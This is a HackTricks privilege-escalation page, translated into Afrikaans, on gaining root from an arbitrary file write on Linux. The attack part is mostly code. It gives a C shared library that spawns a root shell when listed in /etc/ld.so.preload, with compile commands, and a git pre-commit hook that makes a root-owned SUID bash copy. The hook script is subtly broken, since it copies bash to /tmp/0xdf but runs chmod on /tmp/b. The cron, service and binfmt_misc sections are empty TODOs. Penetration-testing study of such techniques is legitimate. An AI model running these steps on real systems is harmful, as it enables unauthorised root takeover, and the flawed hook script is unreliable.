hacktricks/linux-hardening/privilege-escalation/write-to-root.md

3.8 KiB

Willekeurige Lêer Skryf na Root

Leer AWS hak vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

/etc/ld.so.preload

Hierdie lêer gedra soos die LD_PRELOAD omgewingsveranderlike, maar dit werk ook in SUID-binêre lêers.
As jy dit kan skep of wysig, kan jy net 'n pad na 'n biblioteek wat gelaai sal word by elke uitgevoerde binêre lêer, byvoeg.

Byvoorbeeld: echo "/tmp/pe.so" > /etc/ld.so.preload

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unlink("/etc/ld.so.preload");
setgid(0);
setuid(0);
system("/bin/bash");
}
//cd /tmp
//gcc -fPIC -shared -o pe.so pe.c -nostartfiles

Git hakke

Git hakke is skripte wat uitgevoer word by verskeie gebeure in 'n git-opgaarplek soos wanneer 'n toewysing geskep word, 'n samevoeging... Dus, as 'n bevoorregte skrip of gebruiker gereeld hierdie aksies uitvoer en dit moontlik is om in die .git-vouer te skryf, kan dit gebruik word vir privilege-escalation.

Byvoorbeeld, dit is moontlik om 'n skrip te genereer in 'n git-opgaarplek in .git/hooks sodat dit altyd uitgevoer word wanneer 'n nuwe toewysing geskep word:

{% code overflow="wrap" %}

echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/0xdf\nchown root:root /tmp/0xdf\nchmod 4777 /tmp/b' > pre-commit
chmod +x pre-commit

Cron & Tyd lêers

TODO

Diens & Soket lêers

TODO

binfmt_misc

Die lêer wat in /proc/sys/fs/binfmt_misc geleë is, dui aan watter binêre lêer watter tipe lêers moet uitvoer. TODO: kontroleer die vereistes om hierdie te misbruik om 'n omgekeerde dop uit te voer wanneer 'n algemene lêertipe oop is.

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun: